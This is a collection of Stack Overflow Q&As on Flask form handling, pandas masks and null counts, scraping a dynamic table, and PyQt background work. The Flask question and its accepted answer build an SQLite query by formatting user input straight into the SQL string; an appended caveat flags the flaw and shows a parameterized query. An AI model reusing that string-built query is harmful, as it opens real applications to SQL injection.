Q: BadRequestKeyError werkzeug.exceptions.BadRequestKeyError: KeyError: 'nume_pacient' I want to get the text from my input with name="nume_pacient" when pressing the button, to pass it to python code and use it in a query in a database; I want the results to be loaded in the same page. HTML PAGE: {% extends "base.html" %} {% block title %}Home{% endblock %} {%block content %} <h1>This is the home page</h1> <br> <button><a href="/populare/">Populare</a></button> <button><a href="/pacienti/">Afisare Pacienti</a></button> <button><a href="/retete/">Afisare Retete</a></button> <button><a href="/internari/">Afisare Internari</a></button> <button><a href="/medici/">Afisare Medici</a></button> <button><a href="/departamente/">Afisare Departamente</a></button> {% for row in rows %} <p> {% for x in row %} {{x}} {% endfor %} </p> {% endfor %} <form method="POST"> <input type="text" name="nume_pacient"> <button><a href="/pacienti/cautare">Cautare Pacient</a> </button> </form> {%endblock%} PYTHON CODE: @auth.route('/pacienti/cautare',methods=["GET","POST"]) def cautarePacient(): if request.method == 'GET': numeCautare=request.form['nume_pacient'] print(numeCautare) connection=sqlite3.connect('database.db') cursor=connection.cursor() cursor.execute("SELECT * FROM pacient WHERE nume='{{x}}'".format(x=numeCautare)) rows=cursor.fetchall() for row in rows: print(row) connection.commit() return render_template("home.html",user=current_user,rows=rows) return '',204 I tried using request.method == 'POST' I tried using request.form.get('nume_pacient') A: Don't put a tags inside buttons (not only in forms but anywhere); instead, provide an action attribute on the form: <form method="POST" action="/pacienti/cautare"> <input type="text" name="nume_pacient"> <button type="submit">Cautare Pacient</button> </form> Then in your Python code you need to read the data sent by the POST request, so: @auth.route('/pacienti/cautare',methods=["GET","POST"]) def cautarePacient(): if request.method == 'POST': numeCautare=request.form['nume_pacient'] print(numeCautare) connection=sqlite3.connect('database.db') cursor=connection.cursor() cursor.execute("SELECT * FROM pacient WHERE nume='{x}'".format(x=numeCautare)) rows=cursor.fetchall() # you don't need to commit after SELECT return render_template("home.html",user=current_user,rows=rows) return '',204
BadRequestKeyError werkzeug.exceptions.BadRequestKeyError: KeyError: 'nume_pacient'
I want to get the text from my input with name="nume_pacient" when pressing the button, to pass it to python code and use it in a query in a database; I want the results to be loaded in the same page. HTML PAGE: {% extends "base.html" %} {% block title %}Home{% endblock %} {%block content %} <h1>This is the home page</h1> <br> <button><a href="/populare/">Populare</a></button> <button><a href="/pacienti/">Afisare Pacienti</a></button> <button><a href="/retete/">Afisare Retete</a></button> <button><a href="/internari/">Afisare Internari</a></button> <button><a href="/medici/">Afisare Medici</a></button> <button><a href="/departamente/">Afisare Departamente</a></button> {% for row in rows %} <p> {% for x in row %} {{x}} {% endfor %} </p> {% endfor %} <form method="POST"> <input type="text" name="nume_pacient"> <button><a href="/pacienti/cautare">Cautare Pacient</a> </button> </form> {%endblock%} PYTHON CODE: @auth.route('/pacienti/cautare',methods=["GET","POST"]) def cautarePacient(): if request.method == 'GET': numeCautare=request.form['nume_pacient'] print(numeCautare) connection=sqlite3.connect('database.db') cursor=connection.cursor() cursor.execute("SELECT * FROM pacient WHERE nume='{{x}}'".format(x=numeCautare)) rows=cursor.fetchall() for row in rows: print(row) connection.commit() return render_template("home.html",user=current_user,rows=rows) return '',204 I tried using request.method == 'POST' I tried using request.form.get('nume_pacient')
[ "Don't add a tags inside buttons (not only in form but everywhere), provide action attribute to form:\n<form method=\"POST\" action=\"/pacienti/cautare\">\n <input type=\"text\" name=\"nume_pacient\">\n <button type=\"submit\">Cautare Pacient</button>\n</form> \n\nThen in your python code you need to get data sent by POST request, so:\n@auth.route('/pacienti/cautare',methods=[\"GET\",\"POST\"])\ndef cautarePacient():\n if request.method == 'POST':\n numeCautare=request.form['nume_pacient']\n print(numeCautare)\n connection=sqlite3.connect('database.db')\n cursor=connection.cursor()\n cursor.execute(\"SELECT * FROM pacient WHERE nume='{{x}}'\".format(x=numeCautare))\n rows=cursor.fetchall()\n # you don't need to commit after SELECT\n return render_template(\"home.html\",user=current_user,rows=rows)\n return '',204\n\n" ]
[ 0 ]
[]
[]
[ "api", "flask", "html", "post", "python" ]
stackoverflow_0074591157_api_flask_html_post_python.txt
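One caveat worth adding to the answer above: building the SQL string with .format leaves the endpoint open to SQL injection, and the brace escaping is easy to get wrong. A safer sketch using sqlite3's parameter placeholders (same route and variable names as the answer):

# Parameterized query: sqlite3 substitutes the value safely, no string formatting.
cursor.execute("SELECT * FROM pacient WHERE nume = ?", (numeCautare,))
rows = cursor.fetchall()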
Q: Access pandas masks in a dictionary I have a dictionary containing several pandas masks as strings for a specific dataframe, but I can't find a way to use those masks. Here is a short reproducible example : df = pd.DataFrame({'age' : [10, 24, 35, 67], 'strength' : [0 , 3, 9, 4]}) masks = {'old_strong' : "(df['age'] >18) & (df['strength'] >5)", 'young_weak' : "(df['age'] <18) & (df['strength'] <5)"} And I would like to do something like : df[masks['young_weak']] But since the mask is a string I get the error KeyError: "(df['age'] <18) & (df['strength] <5)" A: Use DataFrame.query with changed dictionary: masks = {'old_strong' : "(age >18) & (strength >5)", 'young_weak' : "(age <18) & (strength <5)"} print (df.query(masks['young_weak'])) age strength 0 10 0 A: Another way is to set up the masks as functions (lambda expressions) instead of strings. This works: masks = {'old_strong' : lambda row: (row['age'] >18) & (row['strength'] >5), 'young_weak' : lambda row: (row['age'] <18) & (row['strength'] <5)} df[masks['young_weak']] A: If you're allowed to change the masks dictionary, the easiest way is to store filters and not strings like this: masks = { 'old_strong' : (df['age'] >18) & (df['strength'] >5), 'young_weak' : (df['age'] <18) & (df['strength'] <5) } Otherwise, keep the strings and use df.query(masks['young_weak']). A: An unsafe solution and very bad practice, but the only way to evaluate the strings exactly as they are is to use eval: print(df[eval(masks['young_weak'])]) Output: age strength 0 10 0 Here is the link to the reason it's bad.
Access pandas masks in a dictionary
I have a dictionary containing several pandas masks as strings for a specific dataframe, but I can't find a way to use those masks. Here is a short reproducible example : df = pd.DataFrame({'age' : [10, 24, 35, 67], 'strength' : [0 , 3, 9, 4]}) masks = {'old_strong' : "(df['age'] >18) & (df['strength'] >5)", 'young_weak' : "(df['age'] <18) & (df['strength'] <5)"} And I would like to do something like : df[masks['young_weak']] But since the mask is a string I get the error KeyError: "(df['age'] <18) & (df['strength] <5)"
[ "Use DataFrame.query with changed dictionary:\nmasks = {'old_strong' : \"(age >18) & (strength >5)\",\n 'young_weak' : \"(age <18) & (strength <5)\"}\n\nprint (df.query(masks['young_weak']))\n age strength\n0 10 0\n\n", "Another way is to set up the masks as functions (lambda expressions) instead of strings. This works:\nmasks = {'old_strong' : lambda row: (row['age'] >18) & (row['strength'] >5),\n 'young_weak' : lambda row: (row['age'] <18) & (row['strength'] <5)}\ndf[masks['young_weak']]\n\n", "If you're allowed to change the masks dictionary, the easiest way is to store filters and not strings like this:\nmasks = {\n 'old_strong' : (df['age'] >18) & (df['strength'] >5),\n 'young_weak' : (df['age'] <18) & (df['strength'] <5)\n}\n\nOtherwise, keep the strings and use df.query(masks['yound_weak']).\n", "Unsafe solution though, and very bad practice, but the only way to solve it is to use eval:\nprint(df[eval(masks['young_weak'])])\n\nOutput:\n age strength\n0 10 0\n\nHere is the link to the reason it's bad.\n" ]
[ 6, 1, 1, 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0056456780_pandas_python.txt
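The query-string approach from the first answer also composes nicely: because the masks are plain strings, they can be combined before being passed to DataFrame.query. A minimal sketch, assuming the column-name style masks dict from that answer:

import pandas as pd

df = pd.DataFrame({'age': [10, 24, 35, 67], 'strength': [0, 3, 9, 4]})
masks = {'old_strong': "(age > 18) & (strength > 5)",
         'young_weak': "(age < 18) & (strength < 5)"}

# Rows matching either mask: join the query strings with "|".
either = df.query(" | ".join(f"({m})" for m in masks.values()))
print(either)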
Q: How to select, inside a df, only columns that have numeric values I have multiple columns and want to see which null values they contain. Then I want to know whether the columns that have null values are numeric. df.isnull().sum() -> gives me the sum of null values inside the df (question 2 - in pandas the result shows only the first 5 and last 5 columns; how can I see all columns?) Then, from the result given, I want to get only the columns with numeric values A: First, you can type 'df.info()'. It shows information about null data and the number of index entries. If the data is small, you can check it like this: for i in range(len(df.index)): for j in range(len(df.columns)): if df.isna().iloc[i][j] == True: print(f'index is {i}, column is {df.columns[j]}') but if the data is big, this can become a problem. If you want to record the results in another dataframe, you can save them: df_null = {'index':[], 'columns':[]} for i in range(len(df.index)): for j in range(len(df.columns)): if df.isna().iloc[i][j] == True: df_null['index'].append(i) df_null['columns'].append(df.columns[j]) dfna = pd.DataFrame(df_null) It works, but it is quite slow. There may be a better answer, but this is the way I know. Good day, and I hope this answer helps you!
How to select, inside a df, only columns that have numeric values
I have multiple columns and want to see which null values they contain. Then I want to know whether the columns that have null values are numeric. df.isnull().sum() -> gives me the sum of null values inside the df (question 2 - in pandas the result shows only the first 5 and last 5 columns; how can I see all columns?) Then, from the result given, I want to get only the columns with numeric values
[ "1st, you can type 'df.info()'\nThere is about null data and amount of index.\nIf it is small data,\nyou can check like this\nfor i in range(len(df.index)):\n for j in range(len(df.columns)):\n if df.isna().iloc[i][j] == True:\n print(f'index is {i}, column is {df.columns[j]}')\n\nbut if it is big data, it can be make a problem.\nif you wanna check this on other dataframe,\nyou can save it.\ndf_null = {'index':[], 'columns':[]}\nfor i in range(len(df.index)):\n for j in range(len(df.columns)):\n if df.isna().iloc[i][j] == True:\n df_null['index'].append(i)\n df_null['columns'].append(df.columns[j])\n\ndfna = pd.DataFrame(df_null)\n\nIt's working. but it is so slow.\nmaybe there is more good answer but\nI know only this way.\nthen, good day!\nI hope this answer helps you\n" ]
[ 0 ]
[]
[]
[ "data_cleaning", "dataframe", "pandas", "python" ]
stackoverflow_0074576055_data_cleaning_dataframe_pandas_python.txt
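For completeness, pandas has direct answers to both parts of the question, without the nested loops from the answer above. A minimal sketch, assuming df is the dataframe from the question:

import pandas as pd

# Part 1: null counts for every column, not just the truncated head/tail view.
with pd.option_context('display.max_rows', None):
    print(df.isnull().sum())

# Part 2: restrict to numeric columns, then keep only those containing nulls.
numeric = df.select_dtypes(include='number')
numeric_with_nulls = numeric.columns[numeric.isnull().any()]
print(list(numeric_with_nulls))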
Q: How to scrape the table of states? I am trying to scrape the table from: https://worldpopulationreview.com/states My code: from bs4 import BeautifulSoup import requests import pandas as pd url = 'https://worldpopulationreview.com/states' page = requests.get(url) soup = BeautifulSoup(page.text,'lxml') table = soup.find('table', {'class': 'jsx-a3119e4553b2cac7 table is-striped is-hoverable is-fullwidth tp-table-body is-narrow'}) headers = [] for i in table.find_all('th'): title = i.text.strip() headers.append(title) df = pd.DataFrame(columns=headers) for row in table.find_all('tr')[1:]: data = row.find_all('td') row_data = [td.text.strip() for td in data] length = len(df) df.loc[length] = row_data df Currently returns 'NoneType' object has no attribute 'find_all' Clearly the error is because the table variable is returning nothing, but I believe I have the table tag correct. A: The table data is dynamically loaded by JavaScript and bs4 can't render JS but you can do the job bs4 with an automation tool something like selenium and grab the table using pandas DataFrame. from selenium import webdriver import time from bs4 import BeautifulSoup import pandas as pd from selenium.webdriver.chrome.service import Service webdriver_service = Service("./chromedriver") #Your chromedriver path driver = webdriver.Chrome(service=webdriver_service) driver.get('https://worldpopulationreview.com/states') driver.maximize_window() time.sleep(8) soup = BeautifulSoup(driver.page_source,"lxml") #You can pull the table directly from the web page df = pd.read_html(str(soup))[0] print(df) #OR #table= soup.select_one('table[class="jsx-a3119e4553b2cac7 table is-striped is-hoverable is-fullwidth tp-table-body is-narrow"]') # df = pd.read_html(str(table))[0] # print(df) Output: Rank State 2022 Population Growth Rate ... 2010 Population Growth Since 2010 % of US Density (/mi²) 0 1 California 39995077 0.57% ... 37253956 7.36% 11.93% 257 1 2 Texas 29945493 1.35% ... 25145561 19.09% 8.93% 115 2 3 Florida 22085563 1.25% ... 18801310 17.47% 6.59% 412 3 4 New York 20365879 0.41% ... 19378102 5.10% 6.07% 432 4 5 Pennsylvania 13062764 0.23% ... 12702379 2.84% 3.90% 292 5 6 Illinois 12808884 -0.01% ... 12830632 -0.17% 3.82% 231 6 7 Ohio 11852036 0.22% ... 11536504 2.74% 3.53% 290 7 8 Georgia 10916760 0.95% ... 9687653 12.69% 3.26% 190 8 9 North Carolina 10620168 0.86% ... 9535483 11.38% 3.17% 218 9 10 Michigan 10116069 0.19% ... 9883640 2.35% 3.02% 179 10 11 New Jersey 9388414 0.53% ... 8791894 6.78% 2.80% 1277 11 12 Virginia 8757467 0.73% ... 8001024 9.45% 2.61% 222 12 13 Washington 7901429 1.26% ... 6724540 17.50% 2.36% 119 13 14 Arizona 7303398 1.05% ... 6392017 14.26% 2.18% 64 14 15 Massachusetts 7126375 0.68% ... 6547629 8.84% 2.13% 914 15 16 Tennessee 7023788 0.81% ... 6346105 10.68% 2.09% 170 16 17 Indiana 6845874 0.44% ... 6483802 5.58% 2.04% 191 17 18 Maryland 6257958 0.65% ... 5773552 8.39% 1.87% 645 18 19 Missouri 6188111 0.27% ... 5988927 3.33% 1.85% 90 19 20 Wisconsin 5935064 0.35% ... 5686986 4.36% 1.77% 110 20 21 Colorado 5922618 1.27% ... 5029196 17.76% 1.77% 57 21 22 Minnesota 5787008 0.70% ... 5303925 9.11% 1.73% 73 22 23 South Carolina 5217037 0.95% ... 4625364 12.79% 1.56% 174 23 24 Alabama 5073187 0.48% ... 4779736 6.14% 1.51% 100 24 25 Louisiana 4682633 0.27% ... 4533372 3.29% 1.40% 108 25 26 Kentucky 4539130 0.37% ... 4339367 4.60% 1.35% 115 26 27 Oregon 4318492 0.95% ... 3831074 12.72% 1.29% 45 27 28 Oklahoma 4000953 0.52% ... 3751351 6.65% 1.19% 58 28 29 Connecticut 3612314 0.09% ... 
3574097 1.07% 1.08% 746 29 30 Utah 3373162 1.53% ... 2763885 22.04% 1.01% 41 30 31 Iowa 3219171 0.45% ... 3046355 5.67% 0.96% 58 31 32 Nevada 3185426 1.28% ... 2700551 17.95% 0.95% 29 32 33 Arkansas 3030646 0.32% ... 2915918 3.93% 0.90% 58 33 34 Mississippi 2960075 -0.02% ... 2967297 -0.24% 0.88% 63 34 35 Kansas 2954832 0.29% ... 2853118 3.57% 0.88% 36 35 36 New Mexico 2129190 0.27% ... 2059179 3.40% 0.64% 18 36 37 Nebraska 1988536 0.68% ... 1826341 8.88% 0.59% 26 37 38 Idaho 1893410 1.45% ... 1567582 20.79% 0.56% 23 38 39 West Virginia 1781860 -0.33% ... 1852994 -3.84% 0.53% 74 39 40 Hawaii 1474265 0.65% ... 1360301 8.38% 0.44% 230 40 41 New Hampshire 1389741 0.44% ... 1316470 5.57% 0.41% 155 41 42 Maine 1369159 0.25% ... 1328361 3.07% 0.41% 44 42 43 Rhode Island 1106341 0.41% ... 1052567 5.11% 0.33% 1070 43 44 Montana 1103187 0.87% ... 989415 11.50% 0.33% 8 44 45 Delaware 1008350 0.92% ... 897934 12.30% 0.30% 517 45 46 South Dakota 901165 0.81% ... 814180 10.68% 0.27% 12 46 47 North Dakota 800394 1.35% ... 672591 19.00% 0.24% 12 47 48 Alaska 738023 0.31% ... 710231 3.91% 0.22% 1 48 49 Vermont 646545 0.27% ... 625741 3.32% 0.19% 70 49 50 Wyoming 579495 0.23% ... 563626 2.82% 0.17% 6 [50 rows x 9 columns] A: Table is rendered dynamically from JSON that is placed at the end of the source code, so it do not need selenium simply extract the tag and load the JSON - This also includes all additional information from the page: soup = BeautifulSoup(requests.get('https://worldpopulationreview.com/states').text) json.loads(soup.select_one('#__NEXT_DATA__').text)['props']['pageProps']['data'] Example import requests, json import pandas as pd from bs4 import BeautifulSoup soup = BeautifulSoup(requests.get('https://worldpopulationreview.com/states').text) pd.DataFrame( json.loads(soup.select_one('#__NEXT_DATA__').text)['props']['pageProps']['data'] ) Example Cause there are also additional information, that is used for the map, simply choose columns you need by header. fips state densityMi pop2022 pop2021 pop2020 pop2019 pop2010 growthRate growth growthSince2010 area fill Name rank 0 6 California 256.742 39995077 39766650 39538223 39309799 37253956 0.00574419 228427 0.0735793 155779 #084594 California 1 1 48 Texas 114.632 29945493 29545499 29145505 28745507 25145561 0.0135382 399994 0.190886 261232 #084594 Texas 2 2 12 Florida 411.852 22085563 21811875 21538187 21264502 18801310 0.0125477 273688 0.174682 53625 #084594 Florida 3 3 36 New York 432.158 20365879 20283564 20201249 20118937 19378102 0.00405821 82315 0.0509739 47126 #084594 New York 4 4 42 Pennsylvania 291.951 13062764 13032732 13002700 12972667 12702379 0.00230435 30032 0.0283715 44743 #2171b5 Pennsylvania 5 ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... 45 46 South Dakota 11.887 901165 893916 886667 879421 814180 0.00810926 7249 0.106838 75811 #c6dbef South Dakota 46 46 38 North Dakota 11.5997 800394 789744 779094 768441 672591 0.0134854 10650 0.190016 69001 #c6dbef North Dakota 47 47 2 Alaska 1.29332 738023 735707 733391 731075 710231 0.00314799 2316 0.0391309 570641 #c6dbef Alaska 48 48 50 Vermont 70.147 646545 644811 643077 641347 625741 0.00268916 1734 0.033247 9217 #c6dbef Vermont 49 49 56 Wyoming 5.96845 579495 578173 576851 575524 563626 0.00228651 1322 0.0281552 97093 #c6dbef Wyoming 50
How to scrape the table of states?
I am trying to scrape the table from: https://worldpopulationreview.com/states My code: from bs4 import BeautifulSoup import requests import pandas as pd url = 'https://worldpopulationreview.com/states' page = requests.get(url) soup = BeautifulSoup(page.text,'lxml') table = soup.find('table', {'class': 'jsx-a3119e4553b2cac7 table is-striped is-hoverable is-fullwidth tp-table-body is-narrow'}) headers = [] for i in table.find_all('th'): title = i.text.strip() headers.append(title) df = pd.DataFrame(columns=headers) for row in table.find_all('tr')[1:]: data = row.find_all('td') row_data = [td.text.strip() for td in data] length = len(df) df.loc[length] = row_data df Currently returns 'NoneType' object has no attribute 'find_all' Clearly the error is because the table variable is returning nothing, but I believe I have the table tag correct.
[ "The table data is dynamically loaded by JavaScript and bs4 can't render JS but you can do the job bs4 with an automation tool something like selenium and grab the table using pandas DataFrame.\nfrom selenium import webdriver\nimport time\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium.webdriver.chrome.service import Service\n\nwebdriver_service = Service(\"./chromedriver\") #Your chromedriver path\ndriver = webdriver.Chrome(service=webdriver_service)\n\ndriver.get('https://worldpopulationreview.com/states')\ndriver.maximize_window()\ntime.sleep(8)\n\n\nsoup = BeautifulSoup(driver.page_source,\"lxml\")\n\n\n#You can pull the table directly from the web page\ndf = pd.read_html(str(soup))[0]\nprint(df)\n\n#OR\n#table= soup.select_one('table[class=\"jsx-a3119e4553b2cac7 table is-striped is-hoverable is-fullwidth tp-table-body is-narrow\"]')\n# df = pd.read_html(str(table))[0]\n# print(df)\n\nOutput:\n Rank State 2022 Population Growth Rate ... 2010 Population Growth Since 2010 % of US Density (/mi²)\n0 1 California 39995077 0.57% ... 37253956 7.36% 11.93% 257\n1 2 Texas 29945493 1.35% ... 25145561 19.09% 8.93% 115\n2 3 Florida 22085563 1.25% ... 18801310 17.47% 6.59% 412\n3 4 New York 20365879 0.41% ... 19378102 5.10% 6.07% 432\n4 5 Pennsylvania 13062764 0.23% ... 12702379 2.84% 3.90% 292\n5 6 Illinois 12808884 -0.01% ... 12830632 -0.17% 3.82% 231\n6 7 Ohio 11852036 0.22% ... 11536504 2.74% 3.53% 290\n7 8 Georgia 10916760 0.95% ... 9687653 12.69% 3.26% 190\n8 9 North Carolina 10620168 0.86% ... 9535483 11.38% 3.17% 218\n9 10 Michigan 10116069 0.19% ... 9883640 2.35% 3.02% 179\n10 11 New Jersey 9388414 0.53% ... 8791894 6.78% 2.80% 1277\n11 12 Virginia 8757467 0.73% ... 8001024 9.45% 2.61% 222\n12 13 Washington 7901429 1.26% ... 6724540 17.50% 2.36% 119\n13 14 Arizona 7303398 1.05% ... 6392017 14.26% 2.18% 64\n14 15 Massachusetts 7126375 0.68% ... 6547629 8.84% 2.13% 914\n15 16 Tennessee 7023788 0.81% ... 6346105 10.68% 2.09% 170\n16 17 Indiana 6845874 0.44% ... 6483802 5.58% 2.04% 191\n17 18 Maryland 6257958 0.65% ... 5773552 8.39% 1.87% 645\n18 19 Missouri 6188111 0.27% ... 5988927 3.33% 1.85% 90\n19 20 Wisconsin 5935064 0.35% ... 5686986 4.36% 1.77% 110\n20 21 Colorado 5922618 1.27% ... 5029196 17.76% 1.77% 57\n21 22 Minnesota 5787008 0.70% ... 5303925 9.11% 1.73% 73\n22 23 South Carolina 5217037 0.95% ... 4625364 12.79% 1.56% 174\n23 24 Alabama 5073187 0.48% ... 4779736 6.14% 1.51% 100\n24 25 Louisiana 4682633 0.27% ... 4533372 3.29% 1.40% 108\n25 26 Kentucky 4539130 0.37% ... 4339367 4.60% 1.35% 115\n26 27 Oregon 4318492 0.95% ... 3831074 12.72% 1.29% 45\n27 28 Oklahoma 4000953 0.52% ... 3751351 6.65% 1.19% 58\n28 29 Connecticut 3612314 0.09% ... 3574097 1.07% 1.08% 746\n29 30 Utah 3373162 1.53% ... 2763885 22.04% 1.01% 41\n30 31 Iowa 3219171 0.45% ... 3046355 5.67% 0.96% 58\n31 32 Nevada 3185426 1.28% ... 2700551 17.95% 0.95% 29\n32 33 Arkansas 3030646 0.32% ... 2915918 3.93% 0.90% 58\n33 34 Mississippi 2960075 -0.02% ... 2967297 -0.24% 0.88% 63\n34 35 Kansas 2954832 0.29% ... 2853118 3.57% 0.88% 36\n35 36 New Mexico 2129190 0.27% ... 2059179 3.40% 0.64% 18\n36 37 Nebraska 1988536 0.68% ... 1826341 8.88% 0.59% 26\n37 38 Idaho 1893410 1.45% ... 1567582 20.79% 0.56% 23\n38 39 West Virginia 1781860 -0.33% ... 1852994 -3.84% 0.53% 74\n39 40 Hawaii 1474265 0.65% ... 1360301 8.38% 0.44% 230\n40 41 New Hampshire 1389741 0.44% ... 1316470 5.57% 0.41% 155\n41 42 Maine 1369159 0.25% ... 1328361 3.07% 0.41% 44\n42 43 Rhode Island 1106341 0.41% ... 
1052567 5.11% 0.33% 1070\n43 44 Montana 1103187 0.87% ... 989415 11.50% 0.33%\n8\n44 45 Delaware 1008350 0.92% ... 897934 12.30% 0.30% 517\n45 46 South Dakota 901165 0.81% ... 814180 10.68% 0.27% 12\n46 47 North Dakota 800394 1.35% ... 672591 19.00% 0.24% 12\n47 48 Alaska 738023 0.31% ... 710231 3.91% 0.22%\n1\n48 49 Vermont 646545 0.27% ... 625741 3.32% 0.19% 70\n49 50 Wyoming 579495 0.23% ... 563626 2.82% 0.17%\n6\n\n[50 rows x 9 columns]\n\n", "Table is rendered dynamically from JSON that is placed at the end of the source code, so it do not need selenium simply extract the tag and load the JSON - This also includes all additional information from the page:\nsoup = BeautifulSoup(requests.get('https://worldpopulationreview.com/states').text)\n\njson.loads(soup.select_one('#__NEXT_DATA__').text)['props']['pageProps']['data']\n\nExample\nimport requests, json\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\nsoup = BeautifulSoup(requests.get('https://worldpopulationreview.com/states').text)\n\npd.DataFrame(\n json.loads(soup.select_one('#__NEXT_DATA__').text)['props']['pageProps']['data']\n)\n\nExample\nCause there are also additional information, that is used for the map, simply choose columns you need by header.\n\n\n\n\n\nfips\nstate\ndensityMi\npop2022\npop2021\npop2020\npop2019\npop2010\ngrowthRate\ngrowth\ngrowthSince2010\narea\nfill\nName\nrank\n\n\n\n\n0\n6\nCalifornia\n256.742\n39995077\n39766650\n39538223\n39309799\n37253956\n0.00574419\n228427\n0.0735793\n155779\n#084594\nCalifornia\n1\n\n\n1\n48\nTexas\n114.632\n29945493\n29545499\n29145505\n28745507\n25145561\n0.0135382\n399994\n0.190886\n261232\n#084594\nTexas\n2\n\n\n2\n12\nFlorida\n411.852\n22085563\n21811875\n21538187\n21264502\n18801310\n0.0125477\n273688\n0.174682\n53625\n#084594\nFlorida\n3\n\n\n3\n36\nNew York\n432.158\n20365879\n20283564\n20201249\n20118937\n19378102\n0.00405821\n82315\n0.0509739\n47126\n#084594\nNew York\n4\n\n\n4\n42\nPennsylvania\n291.951\n13062764\n13032732\n13002700\n12972667\n12702379\n0.00230435\n30032\n0.0283715\n44743\n#2171b5\nPennsylvania\n5\n\n\n...\n...\n...\n...\n...\n...\n...\n...\n...\n...\n...\n\n...\n...\n...\n...\n\n\n45\n46\nSouth Dakota\n11.887\n901165\n893916\n886667\n879421\n814180\n0.00810926\n7249\n0.106838\n75811\n#c6dbef\nSouth Dakota\n46\n\n\n46\n38\nNorth Dakota\n11.5997\n800394\n789744\n779094\n768441\n672591\n0.0134854\n10650\n0.190016\n69001\n#c6dbef\nNorth Dakota\n47\n\n\n47\n2\nAlaska\n1.29332\n738023\n735707\n733391\n731075\n710231\n0.00314799\n2316\n0.0391309\n570641\n#c6dbef\nAlaska\n48\n\n\n48\n50\nVermont\n70.147\n646545\n644811\n643077\n641347\n625741\n0.00268916\n1734\n0.033247\n9217\n#c6dbef\nVermont\n49\n\n\n49\n56\nWyoming\n5.96845\n579495\n578173\n576851\n575524\n563626\n0.00228651\n1322\n0.0281552\n97093\n#c6dbef\nWyoming\n50\n\n\n\n" ]
[ 3, 2 ]
[]
[]
[ "beautifulsoup", "python", "web_scraping" ]
stackoverflow_0074591839_beautifulsoup_python_web_scraping.txt
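A small robustness note on the second answer's JSON route: the __NEXT_DATA__ blob contains more columns than the rendered table, so selecting and renaming the wanted fields keeps the result tidy. A sketch under the assumption that the page keeps its current key layout (rank, state, pop2022, growthRate, densityMi):

import json
import requests
import pandas as pd
from bs4 import BeautifulSoup

soup = BeautifulSoup(requests.get('https://worldpopulationreview.com/states').text, 'html.parser')
raw = json.loads(soup.select_one('#__NEXT_DATA__').text)['props']['pageProps']['data']

df = (pd.DataFrame(raw)
        [['rank', 'state', 'pop2022', 'growthRate', 'densityMi']]
        .rename(columns={'pop2022': 'population_2022', 'densityMi': 'density_per_mi2'}))
print(df.head())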
Q: Periodic task in Qt without interrupting events I have a graphic application in python using QWidget. The user can change elements by moving the mouse (using mouseMoveEvent), and the program should periodically (e.g., once per second) compute a function update_forces based on these elements. Problem: the mouseMoveEvent doesn't trigger as often while update_forces is computed, so the program becomes periodically unresponsive. There are various tutorials online on how to remedy this using threads, but their solutions don't work for me, and I don't know why. MWE # Imports import sys import random import time from PyQt5.QtCore import QThread, pyqtSignal, QObject from PyQt5.QtWidgets import QWidget, QApplication # update_forces dummy def update_forces(): for i in range(10000000): x = i**2 # Worker object: class Worker(QObject): finished = pyqtSignal() def run(self): while(True): update_forces() time.sleep(1) # and the Window class with a dummy mouseEvent that just prints a random number class Window(QWidget): def __init__(self): super().__init__() self.initUI() self.setMouseTracking(True) def initUI(self): self.setGeometry(20, 20, 500, 500) self.show() self.thread = QThread() self.worker = Worker() self.worker.moveToThread(self.thread) self.thread.started.connect(self.worker.run) self.worker.finished.connect(self.thread.quit) self.worker.finished.connect(self.worker.deleteLater) self.thread.finished.connect(self.thread.deleteLater) self.thread.start() def mouseMoveEvent(self, e): print(random.random()) # head procedure if __name__ == '__main__': app = QApplication(sys.argv) w = Window() w.show() sys.exit(app.exec_()) When I run this (Windows 10) and move my cursor around on the screen, I can clearly observe two phases: it goes from printing numbers rapidly (while update_forces is not computed), to printing them much more slowly (while it is computed). It keeps alternating between both. A: The solution is to use multiprocessing rather than threading. import time from multiprocessing import Process def updater(): while True: update_forces() time.sleep(1) if __name__ == '__main__': p = Process(target=updater) p.start() The problem with this is that no data is shared between processes by default, but that's solvable.
Periodic task in Qt without interrupting events
I have a graphic application in python using QWidget. The user can change elements by moving the mouse (using mouseMoveEvent), and the program should periodically (e.g., once per second) compute a function update_forces based on these elements. Problem: the mouseMoveEvent doesn't trigger as often while update_forces is computed, so the program becomes periodically unresponsive. There are various tutorials online on how to remedy this using threads, but their solutions don't work for me, and I don't know why. MWE # Imports import sys import random import time from PyQt5.QtCore import QThread, pyqtSignal, QObject from PyQt5.QtWidgets import QWidget, QApplication # update_forces dummy def update_forces(): for i in range(10000000): x = i**2 # Worker object: class Worker(QObject): finished = pyqtSignal() def run(self): while(True): update_forces() time.sleep(1) # and the Window class with a dummy mouseEvent that just prints a random number class Window(QWidget): def __init__(self): super().__init__() self.initUI() self.setMouseTracking(True) def initUI(self): self.setGeometry(20, 20, 500, 500) self.show() self.thread = QThread() self.worker = Worker() self.worker.moveToThread(self.thread) self.thread.started.connect(self.worker.run) self.worker.finished.connect(self.thread.quit) self.worker.finished.connect(self.worker.deleteLater) self.thread.finished.connect(self.thread.deleteLater) self.thread.start() def mouseMoveEvent(self, e): print(random.random()) # head procedure if __name__ == '__main__': app = QApplication(sys.argv) w = Window() w.show() sys.exit(app.exec_()) When I run this (Windows 10) and move my cursor around on the screen, I can clearly observe two phases: it goes from printing numbers rapidly (while update_forces is not computed), to printing them much more slowly (while it is computed). It keeps alternating between both.
[ "The solution is to use multiprocessing rather than threading.\nfrom multiprocessing import Process\nif __name__ == '__main__':\n p = Process(target=updater, args=())\n p.start()\n\ndef updater(queue,test):\n while(True):\n update_forces()\n time.sleep(1)\n\nThe problem with this is that no data is shared between processes by default, but that's solvable.\n" ]
[ 0 ]
[]
[]
[ "pyqt", "python", "qt", "qwidget" ]
stackoverflow_0074590391_pyqt_python_qt_qwidget.txt
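Following up on the answer's closing remark that sharing data between processes "is solvable": one common pattern is a multiprocessing.Queue that the worker fills and the Qt side drains with a QTimer, so the GUI thread never blocks. A minimal sketch; the computation is a stand-in for the question's update_forces:

import time
from multiprocessing import Process, Queue
from queue import Empty

def updater(q):
    # Worker process: do the heavy computation and hand results back.
    while True:
        result = sum(i * i for i in range(100_000))  # stand-in for update_forces()
        q.put(result)
        time.sleep(1)

def drain(q):
    # Call this from a QTimer in the GUI thread; it never blocks.
    try:
        while True:
            print(q.get_nowait())
    except Empty:
        pass

if __name__ == '__main__':
    q = Queue()
    Process(target=updater, args=(q,), daemon=True).start()
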